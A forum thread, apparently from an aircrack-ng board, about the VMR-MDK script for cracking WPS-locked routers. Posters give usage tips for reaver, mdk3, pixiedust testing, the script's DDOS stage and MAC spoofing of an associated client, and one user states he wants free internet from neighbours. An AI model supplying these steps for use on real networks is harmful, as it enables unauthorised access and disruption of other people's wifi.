FUNC_CHECKSUM(){       # function written by antares_145 from crack-wifi.com
thanks in advance

Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 11:23:43 pm
To devilsadvocate

   There is a reaver program called ryreaver-reverse. There is no installation; you run the program with ./ryreaver-reverse from root. You must use the --session=<> option to save the work or the program starts the attack all over again. It also does not support pixiedust, but you can test for pixiedust data sequences with the normal reaver program by setting --pin= to some pin other than 12345670. Then use PDDSA-06.sh to test for the pin. If no pin is found you can restart ryreaver-reverse.

    The pin matter with Netgear is interesting - We will pass it on

    The download should be still on the net. If not post here and MTeams will upload it to datahost and aircrack-ng for you.

    Reference the loading of files from a live session. There must be a reason you are not using a persistent usb install or a HardDrive install. Please explain?



Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2016, 11:31:45 pm
To kcdtv

     We copied your additions to an update file and will include your request and probably one better at the  script start whenever an update is required. We expect that Kali-linux 2016.1R will be updated soon which then may require further coding.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: devilsadvocate on March 07, 2016, 04:05:28 am
    Reference the loading of files from a live session. There must be a reason you are not using a persistent usb install or a HardDrive install. Please explain?

Musket Teams
Simply, I don't wish to dedicate an entire hard drive or flash drive to a persistent install.  Using a live version of the OS and simply copying files as needed works well for me.

I'll probably write the script myself.  No big deal.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kcdtv on March 07, 2016, 11:10:57 am
Thanks Musket  ;)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: 0ops on March 08, 2016, 12:42:45 am
I tried installing it in Kali Rolling but it says the same thing as in the Kali forums: "No such File or directory"... I also asked the same thing in the Kali forums but did not get any solution.

Are you working on updating the script?
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 08, 2016, 11:34:50 am
See the new download addresses; however, try unzipping in root. You should get a package of files, not an exe file.

Place the script in root

chmod 755  VMR-MDK script

then

./VMR-MDK script


File should run

MTeams

We are not updating at this time as the script is running fine on all our computers.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: lockback on March 17, 2016, 10:10:54 am
hello, also works with unlocked wps?
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 20, 2016, 07:43:42 am
To lockback:
     If you are asking if it can work against Open WPS systems then yes it can work but for open WPS systems you are far better off using the command line with reaver or bully. Employing DDOS available thru VMR-MDK could have a negative effect. If however you turn off the DDOS process of stage three during the setup it could work.

     Suggest you try the command line first. If you still want to use VMR-MDK then read the help files carefully.

      MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: lockback on March 21, 2016, 02:28:11 pm
thanks  :D
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 29, 2016, 03:50:05 am
MTeams notes in the help files that the VMR-MDK process only works on a subset of routers and each router must be individually tested to see if slow pin harvesting can be induced.

   MTeams suggests users try the program when a client is associated and moving data and possibly spoof the mac of the client as well.

   Spoofing the mac address of the client is supported thru entries in the configuration file.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: kumukumu on April 23, 2016, 06:42:25 am

Hello,

I've read your replies and answers on this thread, and I say "huwattt" hehehhe... I know that you do not like spoon feeding newbies like me. I tried to hack wifi back in 2014 and then I came back again for fun and seeking free neighbors' internet to play League of Legends :). huehuehue..
Well I run Kali Linux 1.0 in VMware and I use a Ralink 3070 Outdoor USB Wireless Adapter Antenna. Also, I use Minidwep-gtk to hack wifi, since I used it long ago to hack via reaver and now, guess what, out of 30 wifi's 3 of them are with WPS when I scan using minidwep. When I try to use Reaver on them I receive AP rate limiting or cannot associate with the .......

I am curious about the Cracking WPS locked Routers, since out of 30 wifi's 3 of them have WPS when I scan thru Minidwep-gtk..



Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 23, 2016, 02:53:30 pm
MTeams do not mind assisting you.  You are using Kali 1.10a. Make sure pixiedust mods are installed. We suggest using a persistent usb rather than VMware. We know nothing about your equipment or Minidwep.

All the information you need concerning VMR-MDK is found in the help files that are enclosed in the download package.

There is a version for kali 2.0 and 2016R but suggest you avoid 2016R at present.

MTeams



Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: blackcat201 on June 22, 2017, 10:53:15 pm
I am using vmr-mdk-kali2 -kali2016
Stage 2 (reaver) not working   :'(
Please help me
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: EASD on June 25, 2017, 07:15:44 pm
I tried to use vmr-mdk on Kali 2017 (on VMware).
I am using an external wifi card; all programs are ok (also fluxion is ok).
When I used VMR-MDK-K2-2016R-011x9 in this sequence:
1-assume it is in root folder
2-chmod +x VMR-MDK-K2-2016R-011x9
3-./VMR-MDK-K2-2016R-011x9
and the program runs.
I followed the steps but after the program is running it does only stage 1 (just scan AP activity) 10 times
and gives me wps pin failed and then needs to restart.
What is wrong with me?